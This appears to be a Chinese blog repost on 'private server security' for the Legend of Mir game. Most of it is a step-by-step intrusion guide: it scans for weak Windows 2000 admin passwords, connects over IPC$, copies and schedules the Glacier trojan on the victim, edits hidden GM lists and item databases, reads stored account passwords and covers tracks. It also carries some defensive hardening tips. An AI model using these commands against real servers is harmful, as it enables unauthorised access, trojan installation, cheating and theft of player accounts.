用的是WINDOWS 2000 SEVER
1 X-SCAN掃瞄IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)
2 打開DOS系統 在DOS下進行*作!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。
進入了以後就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其餘的想怎麼改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。
我在講講我的 ** 傳奇的遭黑的經歷!
首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!
其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!
再次,有非法GM製造物品,以被查出。分析如下:是針對傳奇而來!
解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,並關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多餘的GM,另外仔細一看,在看AdminList.TXT的文件名後面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!
雖然我寫了一些如何進攻和防禦計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
如何在別人的私服做GM?
攻擊初級教學
我在侵入別人4f所使用的方法
看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在裡面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之後。當足了gm的癮,現在我把方法公佈與大家。。。。
其實我所使用的方法很簡單,只有4個工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 「shed.exe」:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這裡面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! 「流光」雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然後先簡單探測,此時有些網管懶惰,把administrator設置的過於簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! 「冰河」,想必許多朋友都玩過,使用冰河控制一台服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳並且控制他呢? 「cmd.exe」 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$ 「password」 /user:」user」 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin裡的。這裡的」ip」就是主機了,「password」就是超級用戶的密碼,「user」就是超級用戶。比如:net use \\210.248.250.2\ipc$ 「maozhiie」 /user:maozhijie
第二步:copy g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程服務器端。意義:將此文件拷貝到對方的主機winnt裡的system32目錄裡。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火牆估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿……
第三步:net time \\ip 察看對方的服務器時間。由於有時差,應該是一個小時吧!所以必須要以對方的服務器時間為準。
第四步:at \\ip time g-server.exe 這裡的time就是對方的主機時間。作用:在規定時間執行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會玩的軟件。
這時我們就可以控制服務器了,
net use * \\ip\*$ 遠程映射
看這個
mir.db裡面有每個人的數據,並且沒加密的,大家可以用
access找開來改一下,改幾個極品,如0-80攻的木劍啊,0-50魔的六角戒指之類的,那就隨你的便了。只是這樣也太煩人了。呵呵。
比如武器,數據格式如下(全部是16進制)
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
前面**的是物品代碼,然後0xce 00 是武器代碼(高位在後),和物品db數據庫中對應,
例:物品數據庫中屠龍是序號(idx)是205,對應到這裡就是(205+1)轉為16進制是ce
後面的 43 12是當前持久度,88 13是最大持久度。
例:43 12換算成十進制為17170,持久度為17
後面的01 02 03依次是攻擊、魔法、道術。
注意是在原武基礎上增加。
例:上面的屠龍顯示出來是攻擊:5-36,道術:0-2,魔法:0-3。
後面的04 05 06 07 08 09依次是武器的 幸運、詛咒、準確、攻擊速度、強度。
後面兩個空位後緊跟的0x0a是表示武器是否被修煉,具體來說
給武器加攻擊時:
修煉前:00
修煉後:0a
試驗成功後:00,攻擊值增加。
對於首飾和衣服,自己研究吧,這有好多人都知道的吧,我沒細寫。網上這方面的文章是有的,我就不用多說了吧?
然後到, mirserver\mud2\logsrv\iddb下
這裡有個id.db所有人的帳號和密碼都在了,你看著辦吧,不過偷人家的號也不是什麼光榮的事,我是從來不做的,只是常常會拿gm的號來reload一下。呵呵
這裡,我把你邊走邊看加到這個服務器的adminlist,呵呵,這裡是打個比方,這裡加入你的名字),然後,我們到mir.db中找出gm的帳號,再到id.db中找出這個帳號的密碼。好了,ok了,用gm號進入遊戲(進之前m一下他啊,不要讓人家發現了,也不要改人家的密碼,讓人家發現了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。
然後,把你加入adminlist的人物從adminlist裡刪除,好了,你進去遊戲吧,你是gm了,可是真正的gm是不會從服務器端看到你的名字呢!!他也許在想「這裡怎麼了啊?好像還有個gm???」。呵呵,不過不要過火了,不然人家一個reload你的權限就沒了啊。
到這裡大家做gm的夢就完成了,下面我說的就是怎麼遠程控制服務器主機了,比如給他關機啊重啟啊····
私服技術我是一點都不懂。不過服務器安全方面還是略懂一二哦!
服務器入侵主要靠的是帳號與密碼。大家要先明白什麼是系統帳號。什麼是系統密碼!
其它WINDOWS每一個系統都有著他的超級管理員帳號與密碼!
一但這些被黑客掃瞄到的話,哪麼你將會得到一個恐怕的威脅!
當你私服是人氣高的時候。給黑客入侵的話,哪要是萬一給刪了數據。到時候。真的是慘不忍堵。
一:瞭解一下帳號的含義
先運行CMD
然後輸入:net user(回車健)
這樣後,會顯示一例帳號
再查看管理員帳號
輸入:net localgroup administrators
這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來!
系統自帶的超級管理員帳號是administrator
記住這裡顯示出來多個帳號不明的帳號。哪就證明你機器不安全了。若出現在的帳號都是你自已的帳號。哪百分之四十你機器未被入侵
帳號安全:
二:密碼篇
你若覺得自已的帳號密碼是123456哪麼不出三秒人家就到你機上一遊了。
修改密碼方法,在DOS下修改更安全
輸入net user 帳號名 需修改密碼(然後回車健)
一般密碼設複雜一點!
溢出:
2000服務器版裝下去會自動裝IIS的,若你覺得IIS沒有什麼用就停止。IIS地址:開始》》程序》》管理工具》》Internet信息服務(這個就是IIS)你將他開啟。上面按停止!這樣就進一步安全了。不過若IIS你需要用的話,哪麼記得打目前最新的補丁SP4哦。
RPC溢出。大家記住,試試telnet IP 135看看有沒有開著。若是開著。請打RPC補丁。若找不到。乾脆裝個防火牆,將135端屏蔽!
大家千萬要記住。入侵系統最關點的就是要帳號密碼。保護好自已帳號與密碼。安全一定屬於你!
入侵傳奇私服/充當非法GM
首先,我得聲明,我寫本文並不是教大家如何去黑4f,只是想以本文引起廣大4f擁有者的注意
,提高自己的網管水平。
我愛玩遊戲,但卻玩得很菜,也沒有時間去玩,只想玩著過癮,所以,當我開始玩傳奇時,
雖覺得是好玩,但玩盛大的簡直是在受罪,升級慢,沒好裝備,處處受人欺負。所以,4f是明
智的選擇,但進去時也沒有好裝備,也是受人欺負,難道我不可以做gm?試試,folling me!
找來一大堆4f的ip,開個x-scan掃吧。有了,還真不少,都是弱口令的,這些網管真菜呀。
選好一個,192.168.0.1,go!
打開cmd,
1)c:/>net use 192.168.0.1ipc$ /user:administrator
連接成功,
ok,連上了,成功在望,
2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt
系統找不到指定的文件。
沒有?不可能吧?唔,一定是隱藏了,沒關係,再來,
3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt
沒有提示,成功了,
這次連複製也不用了,直接改吧,
4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt
會打開個介面,看看裡面有哪些gm,加個吧,自己記得就行了,改完保存退出
5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt
把adminilist.txt還原成只讀隱藏,
好了,大功告成,快打掃腳印吧,別讓人發現被入侵了,
現在,就等著系統重啟了,等不及的話就在第五步讓它重啟,不過這樣太危險了,還是等吧,
第二天註冊個帳號,新建個之前加的人名進去,
/who
當前150人在線
哈,我就是gm了。趕快把自己升級,
@level -1
升級成功,255級,哈哈
再造出想要的裝備,想要什麼盡情造吧,
重複上面的把自己從adminlist.txt裡刪了,哈哈,好裝備到手了,可以玩了
面記得有位朋友對加強對服務器安全性的解決方法進行了一系列的說明,講得非常詳細,但是我覺得還有很多需要補充的地方.微軟的系統是漏洞和補丁著稱,真正要對服務器的安全配置確實非常困難,考慮的方面也太多了.
今天先講一個方面的內容了,也算是對前面的朋友的進一步補充吧!
前面那位朋友所概述的主要是針對WIN2000系統弱口令的安全設置!他已經說得很仔細了,做到那些,口令這一關差不多了.確實在互聯網的時代,口令真的非常重要.我對國外的主機進行了一系列的測試,就拿有弱口令的系統來說,還有不少!其中也包括了不少中小型企業的WEB服務器,E-MAIL,PROXY服務器都有這種低級的錯誤!
如果說你在這方面做得非常的仔細.但你至少還要仔細研究一下你主機現在所運行的有哪些服務,這些服務代表著什麼?你應該很清楚!因為現在黑客軟件,木馬工具,遠程控制軟件大多是以一種服務的形式運行在你的服務器系統裡,一般的防火牆,殺毒軟件對其並沒有任何反映的.對於服務形式出現的控制工具.比較難得發現,所以你就必須在服務器裡運行的哪些服務非常熟悉.對於陌生或奇怪的服務應該安全設置好.
下面我都WIN2000的WWW(IIS)服務器安全配置略講一下,WWW服務在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默認安裝的,如果你不需要用2000的WWW服務的話,建議不要安裝.至於添加/刪除你可以控制面板的去掉他的安裝,或者在管理工具/服務裡設置WORD WIDE WEB SERVICE啟動類型為手動/禁用
這樣的話系統就不默認啟動改服務!
如果你需要用IIS來建站宣傳一下自己的私服,你就必須按以下方法安全配置好IIS,
在IIS組件你首先要去掉你不需要的SMTP,SNNP,FTP,這樣的話你可以降低你服務器運行所佔用的CPU資源,和內存使用率.然後建議你刪除你C:\INTERPUB\目錄下的所有內容!或者更改路徑.在IIS管理器中刪除默認站點,(或者刪除SCRIPTS這個虛擬目錄)因為這個目錄有可寫的權限的.在新建的WEB站點中,設置IIS的權置,必須讓它不能寫入,或運行.因為IIS是默認支持ASP腳本的.然後在IIS中刪除不需要的映射,這個很重要.如果你要支持PHP,CGI腳本的話,你還得配置好PHP.CGI的應用程序的正確映射,禁用或刪除FSO組件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話,最好要改名!否則的話,你給別人提供主頁上傳的話,你肯定是會被黑的。小心呀!
目前在黑客橫行的互聯網空間中,利用IIS的漏洞,提申自己的權限,而成為AD,這些只是輕而易舉的事情,這不需要花幾天的時間去暴力破解一下口令,像自己架設的WEB服務器有種情況,更是數不甚數了.關於怎利用UNICODE漏洞去提供AD權限的文章,網上太多了,我就不多講了.
這些來說應該是服務器安全防範方面的一個例子而已,真正要做到服務器的安全運行,需要你花大量的時間去摸索.因為這些來說,足以應付一些無聊的.....當然了,你如果需要WEB服務器,我還是建議你去使用AP了.他的源代碼開發,免費,安全性穩定性都比IIS強得多了.
- Nov 26 Sun 2006 13:43
<Hackbase>遊戲私服安全技巧全攻略之攻擊篇
close
全站熱搜
留言列表
發表留言